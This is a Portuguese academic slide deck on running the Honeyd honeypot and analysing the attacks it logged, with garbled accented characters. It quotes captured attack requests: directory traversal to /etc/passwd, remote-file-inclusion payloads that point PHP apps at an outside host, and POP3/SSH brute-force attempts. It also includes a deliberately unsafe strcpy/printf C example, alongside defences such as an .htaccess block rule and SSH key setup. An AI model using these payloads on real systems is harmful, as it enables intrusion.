Uso de Honeypots com Honeyd

50 %
50 %
Information about Uso de Honeypots com Honeyd
Technology

Published on January 15, 2009

Author: UlissesCosta

Source: slideshare.net

Description

Trabalho sobre a implementação de Honeypots recorrendo ao Honeyd

Uso de HoneyPots com o Honeyd Pedro Pereira Ulisses Costa Criptografia e Seguran¸a de Sistemas de Informa¸˜o c ca 18 de Dezembro de 2008 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

O que s˜o HoneyPot’s? a Programas que emulam vulnerabilidades conhecidas Armadilhas para detectar ou impedir ataques Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Tipos de HoneyPot’s Personalidade Alta interac¸˜o (high-interaction) ca Baixa interac¸˜o (low-interaction) ca Modus operandi Servidor Cliente Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Honeyd Cria¸˜o de hosts virtuais ca Configura¸˜o dos hosts ca Suporte para mais de 1000 personalidades Muitas dezenas de scripts para emula¸˜o de servi¸os ca c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Configura¸˜o do Honeyd ca bash > farpd 192.168.1.50 -i eth0 # File : / etc / defaults / honeyd # Defaults for honeyd initscript # Correr como deamon RUN =quot; yes quot; # Interface de rede onde o honeyd vai escutar pedidos INTERFACE =quot; eth0 quot; # Rede que o honeyd simula NETWORK =192.168.1.50 # Conjunto de opcoes # -c hostname : port : username : password OPTIONS =quot; - c localhost :12345: username : password quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

O comando -c hostname:port:username:password Gera¸˜o de estat´ ca ısticas parciais do Honeyd bash > honeydstats -- os_report / etc / honeypot / os -- port_report / etc / honeypot / port -- spammer_report / etc / honeypot / spam -- country_report / etc / honeypot / country -f / etc / honeypot / honeydstats . conf -l localhost -p 12345 # File : / etc / honeypot / honeydstats . conf # Ficheiro de configuracao do honeydstats username : password Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Configura¸˜o do HoneyPot(1/2) ca # File : / etc / honeypot / honeyd . conf # Configuracao do honeypot create win2k set win2k personality quot; Microsoft Windows 2000 SP2 quot; set win2k default tcp action reset set win2k default udp action reset set win2k default icmp action block set win2k uptime 3567 add win2k tcp port 21 quot; sh / usr / share / honeyd / scripts / win32 / win2k / msftp . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 23 quot; perl / usr / share / honeyd / scripts / unix / linux / suse7 .0/ telnetd . sh quot; add win2k tcp port 25 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - smtp . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 80 quot; sh / usr / share / honeyd / scripts / win32 / win2k / iis . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 110 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - pop3 . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 143 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - imap . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 389 quot; sh / usr / share / honeyd / scripts / win32 / win2k / ldap . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 5901 quot; sh / usr / share / honeyd / scripts / win32 / win2k / vnc . sh $ipsrc $sport $ipdst $dport quot; add win2k udp port 161 quot; perl / usr / share / honeyd / scripts / unix / general / snmp / fake - snmp . pl public private -- config = scripts / unix / general quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Configura¸˜o do HoneyPot(2/2) ca add win2k udp port 137 proxy $ipsrc :137 add win2k udp port 138 proxy $ipsrc :138 add win2k udp port 445 proxy $ipsrc :445 add win2k tcp port 137 proxy $ipsrc :137 add win2k tcp port 138 proxy $ipsrc :138 add win2k tcp port 139 proxy $ipsrc :139 add win2k tcp port 445 proxy $ipsrc :445 bind 192.168.1.50 win2k$ Imposs´ monitorizar portos NETBIOS ıvel Grade complexidade Decis˜o reencaminhar para source a Inicializar o nosso HoneyPot: bash > / etc / init . d / honeyd start Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Ficheiros /var/log/honeyd.txt SMTP, Telnet, IMAP, POP3 /var/log/honeypot/web.log HTTP /var/log/honeypot/honeyd.log Log principal do Honeyd Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Formato do ficheiro /var/log/honeypot/honeyd.log Data Protocolo T IPOrig PortOrig IPDst PortDst Info Comment´rio a ... tcp(6) S 88.44.123.210 3637 ... 139 [Windows XP SP1] ... tcp(6) S 82.155.0.49 22617 ... 139 ... tcp(6) E 82.155.1.160 4399 ... 445: 00 ... tcp(6) - 82.155.122.18 61582 ... 139: 40 R ... icmp(1) - 80.236.5.27 ...: 3(13): 56 ... tcp(6) - 82.154.64.174 34507 ... 445: 40 RA ... tcp(6) - 124.8.74.33 1806 ... 25: 70 FPA [Windows XP SP1] ... tcp(6) - 168.167.152.228 58274 ... 445: 52 FA [Windows XP SP1] ... tcp(6) - 168.167.152.228 58274 ... 445: 52 FA ... tcp(6) - 82.155.57.245 58274 ... 445: 52 PA [Windows XP SP1] ... tcp(6) - 193.136.19.149 58274 ... 445: 52 PA ... tcp(6) - 88.175.73.149 4332 ... 139: 40 R [Windows XP SP1] ... tcp(6) - 82.155.137.139 1230 ... 445: 40 A [Windows XP SP1] ... tcp(6) - 82.155.7.176 2794 ... 445: 40 A ... tcp(6) - 82.155.116.238 3578 ... 23: 60 S [Linux 2.6 .1-7] ... tcp(6) - 124.207.41.198 48804 ... 23: 40 S ... udp(17) - 192.168.1.254 67 ... 68: 298 Data no formato: 2008-12-15-22:59:03.4039 IPDst ´ sempre o mesmo (neste caso) - 192.168.1.50 e Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Formato do ficheiro /var/log/honeypot/honeyd.log 2009 -01 -01 -05:57:28.0971 tcp (6) S 79.25.93.226 46984 192.168.1.50 80 2009 -01 -01 -05:58:40.3750 tcp (6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008 Para TCP e UDP n˜o s˜o gravadas todas as transmiss˜es de aa o pacotes Seria demasiando verboso Apenas a quantidade transmitida Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

SMTP Usado do lado do servidor para enviar mensagens Para receber usams POP3 ou IMAP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

SMTP - HoneyPot Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Comando EHLO em SMTP Comando para identificar clientes Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Comando EHLO em SMTP S : 220 bps - pc9 . local . mynet Microsoft ESMTP MAIL Service , Version : 5.0.2195.5329 ready at Sex Jan 9 22:10:11 WET 2009 C : EHLO windows S : 250 - bps - pc9 . local . mynet Hello [12] S : 250 - TURN S : 250 - ATRN S : 250 - SIZE S : 250 - ETRN S : 250 - PIPELINING S : 250 - DSN S : 250 - E N H A N C E D S T A TU S C O D E S S : 250 -8 bitmime S : 250 - BINARYMIME S : 250 - CHUNKING S : 250 - VRFY S : 250 - X - EXPS GSSAPI NTLM LOGIN S : 250 - X - EXPS = LOGIN S : 250 - AUTH GSSAPI NTLM LOGIN S : 250 - AUTH = LOGIN S : 250 - X - LINK2STATE S : 250 - XEXCH50 } S : 250 OK Identifica¸˜o por nomes de dominios n˜o reais ca a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Spamm em servidores SMTP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Solu¸oes c˜ EHLO [host] verificar se resolvem Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Ataques HELO 8 2.155.248.223 MAIL FROM : < jk9l3g4jle@yahoo . com > RCPT TO : < ss e en n dd 12 0 1@ y ah oo . com . hk > DATA Subject : Super webscan open relay check succeded , hostname = 82.155.248.223 2008 -12 -11 -09:45:27.9566 tcp (6) S 124.11.193.219 2774 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -11 -09:46:33.6989 tcp (6) E 124.11.193.219 2774 192.168.1.50 25: 178 920 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Ataques HELO 82.155.251.32 MAIL FROM : < gt 48m7 g3k 6f@ yah oo . com > RCPT TO : < ss e en n dd 12 0 1@ y ah oo . com . hk > DATA Subject : Super webscan open relay check succeded , hostname = 82.155.251.32 2008 -12 -23 -12:18:11.3939 tcp (6) S 114.44.42.34 2748 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:18:11.3953 tcp (6) S 114.44.42.34 2750 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:18:12.1966 tcp (6) E 114.44.42.34 2750 192.168.1.50 25: 0 116 2008 -12 -23 -12:18:13.1996 tcp (6) E 114.44.42.34 2748 192.168.1.50 25: 0 232 2008 -12 -23 -12:21:55.1773 tcp (6) S 114.44.42.34 3347 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:21:57.1324 tcp (6) E 114.44.42.34 3347 192.168.1.50 25: 0 232 2008 -12 -23 -14:06:30.5003 tcp (6) S 114.44.42.34 1634 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -14:06:30.5023 tcp (6) S 114.44.42.34 1635 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -14:06:43.0390 tcp (6) E 114.44.42.34 1635 192.168.1.50 25: 177 335 2008 -12 -23 -14:06:51.4612 tcp (6) E 114.44.42.34 1634 192.168.1.50 25: 177 418 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Ataques HELO 8 2.155.103.147 MAIL FROM : < tt c 58 5t t c5 8 5@ ya h oo . com . tw > RCPT TO : < vjd39hww@yahoo . com . tw > DATA Received : from ( [ 1 4 5 . 2 0 0. 2 0 1 . 1 1 4 ] ) by 82 .155.103.147 id <9624303 -98482 >; Tue , 06 Jan 2009 21:16:04 -0100 Message - ID : < w58 $6a4j1fqc6q@ocjc8ujvz > From : quot;quot; < t t c5 85 t tc 5 85 @y a ho o . com . tw > To : < vjd39hww@yahoo . com . tw > Subject : BC_82 .155.103.147 Date : Tue , 06 Jan 09 21:16:04 GMT MIME - Version : 1.0 Content - Type : multipart / alternative ; boundary =quot; - - - -= _ N e x t P a r t _ 0 0 0 _ 0 0 0 D _ 0 1 C 2 C C 6 0 .49 F4EC70 quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

HTTP hit’s Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

User agent: webcollage/1.135a -- MARK - - ,quot; Mon Dec 15 23:09:00 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;92.240.68.152quot; ,quot;192.168.1.50quot; ,56886 ,80 , quot; GET http :// www . morgangirl . com / pics / land / land1 . jpg HTTP /1.0 User - Agent : webcollage /1.135 a Referer : http :// random . yahoo . com / fast / ryl Host : www . morgangirl . com quot;, -- ENDMARK - - Tentativa de obter uma imagem atrav´s do HoneyPot e HoneyPotpode ter sido “visto” por um proxy scanner HoneyPot como um proxy aberto Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Directory traversal Tamb´m conhecido como dot dot slash attack (../) e Explora a insuficiˆncia de valida¸˜o de pedidos e ca Ficheiros do sistema GET . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:57 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59706 ,80 , quot; GET %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Directory traversal GET . . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:58 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59711 ,80 , quot; GET %2 E %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Directory traversal GET . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:21:02 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59727 ,80 , quot; GET %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 Fetc %5 C %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Directory traversal GET . . . . . . . . . . . . . . . . . . . . etc passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:21:04 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59740 ,80 , quot; GET %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 Cetc %5 Cpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Directory traversal GET // etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:59 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59700 ,80 , quot; GET %2 F %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Conclus˜o a No HoneyPot n˜o foi bem sucedido a Sistema de baixa interactividade No nosso HoneyPot erro 302 Object moved Utiliza¸˜o de NMap scripting engine ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Morfeus Scanner Procura vulnerabilidades PHP Vulnerabilidades conhecidas Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Morfeus Scanner - WebCalendar Cria¸˜o de calend´rios online ca a Vulnerabilidade no ficheiro send reminder.php -- MARK - - ,quot; Wed Dec 24 16:07:29 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;74.52.10.34quot; ,quot;192.168.1.50quot; ,54941 ,80 , quot; GET / webcalendar / tools / send_reminders . php ? noSet =0& includedir = http : / / 2 17 .2 0 .1 7 2. 12 9 / twiki / a . gif ?/ HTTP /1.1 Accept : */* Accept - Language : en - us Accept - Encoding : gzip , deflate User - Agent : Morfeus Scanner Host : 82.155.248.190 Connection : Close quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Morfeus Scanner - Mambo Joomla CMS’s muito conhecido O atacante pretende definir a vari´vel a mosConfig absolute path do ficheiro index.php -- MARK - - ,quot; Wed Dec 24 16:07:34 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;74.52.10.34quot; ,quot;192.168.1.50quot; ,55438 ,80 , quot; GET / shop / index . php ? option = com_registration & task = register // boutique / index2 . php ? _REQUEST =& _REQUEST %5 boption %5 d = com_content & _REQUEST %5 bItemid %5 d =1& GLOBALS =& m o s C o n f i g _ a b s o l u t e _ p a t h = http :/ / 21 7 .2 0. 1 72 . 12 9/ twiki / a . gif ?/ HTTP /1.1 Accept : */* Accept - Language : en - us Accept - Encoding : gzip , deflate User - Agent : Morfeus Scanner Host : 82.155.248.190 Connection : Close quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Prevenir ataques do Morfeus Scanner Uma maneira de bloquear este tipo de ataques vindos do MFS ´ e adicionar as seguintes linhas de c´digo no ficheiro “.htaccess” na o pasta do website. # Start of . htaccess change . RewriteEngine On RewriteCond %{ HTTP_USER_AGENT } ^ Morfeus RewriteRule ^.* $ - [ F ] # End of . htaccess change . Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Tentativa de brute force no servidor POP3 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Tentativa de brute force no servidor POP3 ... -- MARK - - ,quot; Mon Dec 22 11:34:48 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54678 ,110 , quot; USER root PASS root quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:49 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54729 ,110 , quot; USER root PASS root1 quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:50 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54731 ,110 , quot; USER staff PASS staff quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:52 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54774 ,110 , quot; USER root PASS 12345 quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:53 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54774 ,110 , quot; USER www PASS www quot;, -- ENDMARK - - ... Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

SSH Aqui est´ um gr´fico que mostra as tentativas de usernames: a a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

SSH E o seguinte gr´fico mostra as tentativas de passwords: a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Port scanning Descobrir m´quinas e respectivos portos a Cria¸˜o de pacotes personalizados ca Dificil de dominar NMap - insecure.org Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Port scanning Open ou Accepted: A m´quina enviou uma resposta a indicar a que um servi¸o est´ a escutar aquele porto; c a Closed, Denied ou Not Listening : A m´quina enviou uma a resposta a indicar que qualquer conex˜o no porto ser´ negada; a a Filtered, Dropped ou Blocked: N˜o houve resposta por parte a da m´quina. a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Port scanning Tipos de t´cnicas e TCP/SYN TCP Connect UDP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

TCP Connect Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Port scanning Optimiza¸˜o ca golden@golden - laptop :~ $ sudo nmap - sS - sV 192.168.100.0/24 ... Nmap finished : 256 IP addresses (29 hosts up ) scanned in 2033.375 seconds golden@golden - laptop :~ $ sudo nmap - sS - sV - P0 192.168.100.0/24 ... Nmap finished : 256 IP addresses (32 hosts up ) scanned in 2038.191 seconds Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Ataque For¸a bruta / Dicion´rios c a Explora¸˜o de vulnerabilidades ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

SSH Porto 22 Atacado em For¸a bruta / Dicion´rios c a cat /var/log/auth.log Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

SSH - log Dec 24 01:24:46 golden - laptop sshd [23906]: Invalid user oracle from 89.235.152.18 Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:24:48 golden - laptop sshd [23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2 Dec 24 01:24:49 golden - laptop sshd [23908]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Dec 24 01:26:01 golden - laptop sshd [23963]: Invalid user test from 89.235.152.18 Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:26:04 golden - laptop sshd [23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2 Dec 24 01:26:05 golden - laptop sshd [23965]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Dec 24 01:26:21 golden - laptop sshd [23975]: Invalid user cvsuser from 89.235.152.18 Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:26:22 golden - laptop sshd [23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2 Dec 24 01:26:24 golden - laptop sshd [23977]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

SSH Defesa: IPTables passwords mais fortes Autentica¸˜o RSA ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

SSH password m´ ınimo de 8 caracteres password nao triviais combina¸˜es alfanum´ricas co e mnem´nica: “Um Whiskey-Cola vale 3 euros no BA!” = o “UW-Cv3enBA!” Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

SSH http://www.passwordmeter.com/ Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

SSH - Autentica¸˜o RSA ca Geramos o par de chaves com o comando “ssh-keygen -t rsa”. 1 De seguida s˜o criados os ficheiros /.ssh/id rsa (chave a privada) e /.ssh/id rsa.pub (chave p´blica) u Em cada m´quina onde nos quisermos ligar (destino), a 2 colocamos a “id rsa.pub” gerada em /.ssh/authorized keys concatenando o conte´do desta forma por exemplo: “cat u id rsa.pub >> /.ssh/authorized keys” Em cada m´quina de onde nos quisermos ligar (origem), a 3 colocamos a “id rsa” em /.ssh/ S´ falta desactivar o login baseado em password ao adicionar o 4 a linha “PasswordAuthentication no” em /etc/ssh/sshd config e de seguida fazer restart ao daemon “sshd” atrav´s de e “/etc/init.d/sshd restart”. Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Vulnerabilidades Comportamento n˜o previsto num artefacto de software a Buffer Overflow Input n˜o validado a SQL Injection Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Explora¸˜o de vulnerabilidades ca Exploit ´ E a designa¸˜o dada a um peda¸o de c´digo que serve para ca c o explorar falhas em aplica¸˜es de forma a causarem um co comportamento pr´viamente n˜o antecipado nas mesmas. e a # include < stdio .h > # include < string .h > int main ( int argc , char * argv []) { char buffer [10]; strcpy ( buffer , argv [1]) ; printf ( buffer ) ; return 0; } Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Buffer Overflow user@honeypot :~ $ gcc exploit . c -o exploit user@honeypot :~ $ ./ exploit thisisanexploit *** stack smashing detected ***: ./ exploit terminated thisisanexploitAborted Um dos mecanismos de defesa do gcc Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

